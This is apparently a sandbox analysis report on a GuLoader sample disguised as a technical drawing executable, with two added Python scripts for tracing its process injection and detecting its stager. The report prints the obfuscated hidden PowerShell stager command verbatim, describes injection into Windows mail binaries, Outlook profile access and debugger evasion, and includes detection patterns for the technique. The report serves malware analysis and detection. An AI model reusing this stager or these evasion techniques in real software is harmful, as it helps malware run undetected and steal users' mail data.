Analysis

max time kernel: 70s
max time network: 76s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21/03/2024, 07:33
Static task
static1

Behavioral task
behavioral1
Sample: Ref_Technical Drawing Sheet.exe
Resource: win7-20240221-en

Behavioral task
behavioral2
Sample: Ref_Technical Drawing Sheet.exe
Resource: win10v2004-20240226-en

Behavioral task
behavioral3
Sample: Bedwarmer.ps1
Resource: win7-20240221-en

Behavioral task
behavioral4
Sample: Bedwarmer.ps1
Resource: win10v2004-20231215-en
General

Target: Ref_Technical Drawing Sheet.exe
Size: 963KB
MD5: 2f96e6fd36ceec8c32dcc6c7607a87bd
SHA1: 89b9bd60c39a582da440112f12f939c90102d567
SHA256: 11bfafb62ab5e5c115862409c849f069dc0903abf0f864783bea73472db19932
SHA512: 755e29062263821fac7c37be3dd7e0b980804adbe301d1945c9098ca1cb8ae57f293a022a2e11677e404bac323b4e5995d4c57d45c2edb13595ff151547993b9
SSDEEP: 12288:wbZfqmfr+7Iz6tuhHr2WX3rLKJQEKKHP9SxG4A1wF7dieRJ14BEtIX2UgGj+Xtah:wbZCmf67FtuZFX3KJQgl4KEoEoePUF3Z
Malware Config

Signatures

Guloader,Cloudeye
A shellcode-based downloader first seen in 2020.

Accesses Microsoft Outlook profiles  (1 TTP, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | wabmig.exe
Key opened | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | wabmig.exe
Key opened | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | wabmig.exe

Legitimate hosting services abused for malware hosting/C2  (1 TTP, 2 IoCs)
flow | ioc
67 | drive.google.com
68 | drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger  (2 IoCs)
pid | Process
2572 | wabmig.exe
2572 | wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger  (2 IoCs)
pid | Process
3356 | powershell.exe
2572 | wabmig.exe

Suspicious use of SetThreadContext  (1 IoC)
description | pid | Process | procid_target
PID 3356 set thread context of 2572 | 3356 | powershell.exe | 133

Enumerates physical storage devices  (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses  (9 IoCs)
pid | Process
3356 | powershell.exe  (9 identical entries)

Suspicious behavior: MapViewOfSection  (23 IoCs)
pid | Process
3356 | powershell.exe  (23 identical entries)

Suspicious use of AdjustPrivilegeToken  (2 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3356 | powershell.exe
Token: SeDebugPrivilege | 2572 | wabmig.exe

Suspicious use of WriteProcessMemory  (64 IoCs)
description | pid | Process | procid_target
(the report lists every row three times; each is shown once here with its count; procid_target is the sandbox's own process index, not an OS PID)
PID 4756 wrote to memory of 3356 | 4756 | Ref_Technical Drawing Sheet.exe | 89  (x3)
PID 3356 wrote to memory of 3276 | 3356 | powershell.exe | 93  (x3)
PID 3356 wrote to memory of 3916 | 3356 | powershell.exe | 111  (x3)
PID 3356 wrote to memory of 4692 | 3356 | powershell.exe | 112  (x3)
PID 3356 wrote to memory of 1008 | 3356 | powershell.exe | 113  (x3)
PID 3356 wrote to memory of 1476 | 3356 | powershell.exe | 114  (x3)
PID 3356 wrote to memory of 1628 | 3356 | powershell.exe | 115  (x3)
PID 3356 wrote to memory of 4356 | 3356 | powershell.exe | 116  (x3)
PID 3356 wrote to memory of 860 | 3356 | powershell.exe | 117  (x3)
PID 3356 wrote to memory of 2724 | 3356 | powershell.exe | 118  (x3)
PID 3356 wrote to memory of 1708 | 3356 | powershell.exe | 119  (x3)
PID 3356 wrote to memory of 2168 | 3356 | powershell.exe | 120  (x3)
PID 3356 wrote to memory of 660 | 3356 | powershell.exe | 121  (x3)
PID 3356 wrote to memory of 3580 | 3356 | powershell.exe | 122  (x3)
PID 3356 wrote to memory of 4396 | 3356 | powershell.exe | 123  (x3)
PID 3356 wrote to memory of 4680 | 3356 | powershell.exe | 124  (x3)
PID 3356 wrote to memory of 4492 | 3356 | powershell.exe | 125  (x3)
PID 3356 wrote to memory of 64 | 3356 | powershell.exe | 126  (x3)
PID 3356 wrote to memory of 232 | 3356 | powershell.exe | 127  (x3)
PID 3356 wrote to memory of 2708 | 3356 | powershell.exe | 128  (x3)
PID 3356 wrote to memory of 1824 | 3356 | powershell.exe | 129  (x3)
PID 3356 wrote to memory of 1320 | 3356 | powershell.exe | 130  (x1; the 64-entry list ends here)

outlook_office_path  (1 IoC)
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | wabmig.exe

outlook_win_path  (1 IoC)
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | wabmig.exe
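Read together, the WriteProcessMemory and SetThreadContext tables describe the injection chain: the dropper (PID 4756) writes into powershell.exe (PID 3356), which then writes into a long run of wab.exe and ImagingDevices.exe children but replaces the thread context of only one process, wabmig.exe (PID 2572). The Python below is an added example, not part of this report or of the sample. It parses the report's flattened row format into that graph, collapsing the repeated rows and separating "written to" from "thread context replaced". The excerpt it embeds is copied from the rows above and shortened. One caveat the script makes visible: the WriteProcessMemory list stops at PID 1320 (the 64-entry cap), so the writes into the later children in the process tree (3276 again, 3360 and 2572) are not shown, and the single SetThreadContext row is what identifies the live host.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List, Set, Tuple

# One IoC row as rendered by the report. Process names may contain spaces
# ("Ref_Technical Drawing Sheet.exe"), so the row is anchored on the source
# PID being repeated after the target PID, and the trailing sandbox process
# index (procid_target, not an OS PID) is the last number before the next
# "PID" token or the end of the text.
ROW_RE = re.compile(
    r"PID (?P<src>\d+) (?P<verb>wrote to memory of|set thread context of) (?P<dst>\d+) "
    r"(?P=src) (?P<proc>.+?) (?P<procid>\d+)(?=\s+PID\s|\s*-?\s*$)",
    re.MULTILINE,
)

# Excerpt copied from the report's tables (the full list has 64 rows).
WPM_EXCERPT = (
    "description pid Process procid_target "
    "PID 4756 wrote to memory of 3356 4756 Ref_Technical Drawing Sheet.exe 89 "
    "PID 4756 wrote to memory of 3356 4756 Ref_Technical Drawing Sheet.exe 89 "
    "PID 4756 wrote to memory of 3356 4756 Ref_Technical Drawing Sheet.exe 89 "
    "PID 3356 wrote to memory of 3276 3356 powershell.exe 93 "
    "PID 3356 wrote to memory of 3276 3356 powershell.exe 93 "
    "PID 3356 wrote to memory of 3276 3356 powershell.exe 93 "
    "PID 3356 wrote to memory of 3916 3356 powershell.exe 111 "
    "PID 3356 wrote to memory of 3580 3356 powershell.exe 122 "
    "PID 3356 wrote to memory of 1320 3356 powershell.exe 130 -"
)
STC_EXCERPT = (
    "description pid Process procid_target "
    "PID 3356 set thread context of 2572 3356 powershell.exe 133 -"
)


def parse_rows(text: str) -> List[Tuple[str, int, int, str]]:
    """(verb, source pid, target pid, source process name) for each IoC row."""
    return [(m["verb"], int(m["src"]), int(m["dst"]), m["proc"])
            for m in ROW_RE.finditer(text)]


def injection_graph(wpm_text: str, stc_text: str) -> Dict[str, object]:
    """Collapse repeated rows into edges and separate the two behaviours."""
    writes: Counter = Counter()            # (src, dst) -> WriteProcessMemory rows
    names: Dict[int, str] = {}
    for _, src, dst, proc in parse_rows(wpm_text):
        writes[(src, dst)] += 1
        names[src] = proc
    context_targets: Set[int] = set()
    for _, src, dst, proc in parse_rows(stc_text):
        context_targets.add(dst)
        names[src] = proc
    children: Dict[int, Set[int]] = defaultdict(set)
    for src, dst in writes:
        children[src].add(dst)
    written = {dst for _, dst in writes}
    return {
        "writes": dict(writes),
        "children": {p: sorted(c) for p, c in children.items()},
        "names": names,
        # memory written AND thread context replaced: the hollowing pattern
        "hollowed": sorted(context_targets & written),
        # thread context replaced, but its write rows fell past the 64-row cap
        "context_only": sorted(context_targets - written),
        # written to, but never given a new thread context in the visible rows
        "written_only": sorted(written - context_targets),
    }


def root_pids(graph) -> List[int]:
    """Processes that write into others but were never written to: the dropper."""
    srcs = {s for s, _ in graph["writes"]}
    dsts = {d for _, d in graph["writes"]}
    return sorted(srcs - dsts)


def spray_parent(graph) -> int:
    """The process with the most distinct write targets: the in-memory stager."""
    return max(graph["children"], key=lambda p: len(graph["children"][p]))


if __name__ == "__main__":
    g = injection_graph(WPM_EXCERPT, STC_EXCERPT)
    root, stager = root_pids(g)[0], spray_parent(g)
    print(f"dropper {root} ({g['names'][root]}) -> stager {stager} ({g['names'][stager]})")
    print("stager wrote into:", g["children"][stager])
    print("thread context replaced in:", g["hollowed"] or g["context_only"])
```

Running it on the excerpt prints the 4756 -> 3356 chain, the four visible write targets of 3356, and 2572 as the only process whose thread context was replaced; on a full export of the 64 rows the same functions show the whole spray.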
Processes

C:\Users\Admin\AppData\Local\Temp\Ref_Technical Drawing Sheet.exe
    "C:\Users\Admin\AppData\Local\Temp\Ref_Technical Drawing Sheet.exe"
    PID: 4756
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -windowstyle hidden "$Trykimprgnerede=Get-Content 'C:\Users\Admin\AppData\Local\butikstiders\Sjunger\Bedwarmer.Hom';$Ekstraparlementarisk=$Trykimprgnerede.SubString(59534,3);.$Ekstraparlementarisk($Trykimprgnerede)"
        PID: 3356
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            PID: 3276

        C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            11 instances, no signatures. PIDs (in order): 3916, 4692, 1008, 1476, 1628, 4356, 860, 2724, 1708, 2168, 660

        C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
            "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
            10 instances, no signatures. PIDs (in order): 3580, 4396, 4680, 4492, 64, 232, 2708, 1824, 1320, 3276
            (PID 3276 appears a second time: the cmd.exe above had already exited and the PID was reused)

        C:\Program Files (x86)\windows mail\wabmig.exe
            "C:\Program Files (x86)\windows mail\wabmig.exe"
            PID: 3360

        C:\Program Files (x86)\windows mail\wabmig.exe
            "C:\Program Files (x86)\windows mail\wabmig.exe"
            PID: 2572
            - Accesses Microsoft Outlook profiles
            - Suspicious use of NtCreateThreadExHideFromDebugger
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - Suspicious use of AdjustPrivilegeToken
            - outlook_office_path
            - outlook_win_path
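The powershell.exe command line above (PID 3356) is the sample's stager. It reads a file with a non-script extension (Bedwarmer.Hom), carves three characters out of it at offset 59534, and dot-invokes that token with the whole file as its argument, so the cmdlet that actually runs the payload never appears in the command line. The Python below is an added example, not part of this report or of the sample: it statically recognises that chain in a process command line (for instance the CommandLine field of a Sysmon Event ID 1 or Security 4688 record) and, given a copy of the blob, reads back the carved token without executing anything. The command line is copied from the report; the blob contents and the benign comparison command line are constructed for the example, and the recovery step assumes the blob is one long line, so that Get-Content's one-element array behaves like a single string when .SubString is called on it.

```python
import re
from dataclasses import dataclass
from typing import Optional

# The stager chains three things in one command line:
#   1. Get-Content '<blob>'                 read a blob that is not a .ps1
#   2. $a = $blob.SubString(<offset>, <n>)  carve a short token out of it
#   3. .$a($blob)                           dot-invoke the token as a command
# Variable names are random words and change per sample, so the pattern is
# anchored on the chain itself and ties the names together with back-references.
STAGER_RE = re.compile(
    r"Get-Content\s+'(?P<path>[^']+)'.*?"
    r"\$(?P<alias>\w+)\s*=\s*\$(?P<blob>\w+)"
    r"\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\).*?"
    r"\.\s*\$(?P=alias)\(\s*\$(?P=blob)\s*\)",
    re.IGNORECASE | re.DOTALL,
)

SCRIPT_EXTENSIONS = (".ps1", ".psm1", ".psd1")
INVOKE_ALIASES = {"iex"}  # Invoke-Expression: the three-character invoker alias


@dataclass
class StagerMatch:
    blob_path: str
    offset: int
    length: int
    window_hidden: bool

    @property
    def blob_has_script_extension(self) -> bool:
        return self.blob_path.lower().endswith(SCRIPT_EXTENSIONS)


def detect_stager(cmdline: str) -> Optional[StagerMatch]:
    """Return the carved-token stager parameters, or None for an ordinary command line."""
    m = STAGER_RE.search(cmdline)
    if not m:
        return None
    return StagerMatch(
        blob_path=m["path"],
        offset=int(m["off"]),
        length=int(m["len"]),
        # -windowstyle hidden (PowerShell also accepts the abbreviated -w)
        window_hidden=re.search(r"-w\w*\s+hidden", cmdline, re.I) is not None,
    )


def recover_invoked_token(blob: str, match: StagerMatch) -> str:
    """Read the token the stager would dot-invoke, without executing anything.

    Assumes the blob is a single line (constructed assumption for this example),
    so Get-Content yields a one-element array and .SubString applies to it.
    """
    if match.offset + match.length > len(blob):
        raise ValueError("offset past end of blob: wrong file or truncated copy")
    return blob[match.offset:match.offset + match.length]


def triage(cmdline: str, blob: Optional[str] = None) -> dict:
    """Static findings for one command line, plus the carved token if the blob is at hand."""
    m = detect_stager(cmdline)
    if m is None:
        return {"stager": False}
    findings = {
        "stager": True,
        "blob_path": m.blob_path,
        "offset": m.offset,
        "length": m.length,
        "window_hidden": m.window_hidden,
        "blob_has_script_extension": m.blob_has_script_extension,
    }
    if blob is not None:
        token = recover_invoked_token(blob, m)
        findings["token"] = token
        findings["token_is_invoker"] = token.lower() in INVOKE_ALIASES
    return findings


# Command line copied from the report (PID 3356).
REPORT_CMDLINE = (
    '"powershell.exe" -windowstyle hidden "$Trykimprgnerede=Get-Content '
    r"'C:\Users\Admin\AppData\Local\butikstiders\Sjunger\Bedwarmer.Hom';"
    "$Ekstraparlementarisk=$Trykimprgnerede.SubString(59534,3);"
    '.$Ekstraparlementarisk($Trykimprgnerede)"'
)
# Constructed stand-in for Bedwarmer.Hom (not the real file): filler, the carved
# token at the report's offset, more filler.
FAKE_BLOB = "#" * 59534 + "iex" + "#" * 1000
# Constructed benign command line: reads a file but never invokes its contents.
BENIGN_CMDLINE = "powershell.exe -Command \"Get-Content 'C:\\logs\\app.log' | Select-String error\""

if __name__ == "__main__":
    print(triage(REPORT_CMDLINE, FAKE_BLOB))
    print(triage(BENIGN_CMDLINE))
```

The detection deliberately keys on the structure (read, carve, dot-invoke) rather than on the Danish-looking variable names or the file path, both of which GuLoader changes from sample to sample; the offset and token recovery are what an analyst would use to confirm the verdict against the dropped file before spending time on the 59 KB payload itself.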
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 58KB
MD5: aae5fcb1e66470ef7a08ea335b80ac05
SHA1: 9422c0898c87a134c72c6ffa35c594d93dba9dc9
SHA256: 8bd9205c7c8f112ff5cba1307842eddccc18e20e227cccb7b74e6a24e686b8b0
SHA512: 031d187a47a9b687d6822f34e74029f2f1cf4eb8687dc2846a3d84efbf9d30d5459870842a22cdab89130915501e2593f79b2a32da5c266d382120e0a042b072

Filesize: 347KB
MD5: 1178f466a9ac164a3ca05ffd715235dc
SHA1: e593a180adbbb864047e9dbc5e07a6d27a252139
SHA256: 38bea98d1ec5467345cf29e1a7f1ec9a25fbe7801c8a498ec05e97b6dbf9545b
SHA512: 61269e7303efba0f6d2790b780b9f4348567c6ad48481822201b37e13c17f255d35b368d109ba6c9d9a66d9af1adb7f2db9e3ec6ab1b351f80fce368f23a3650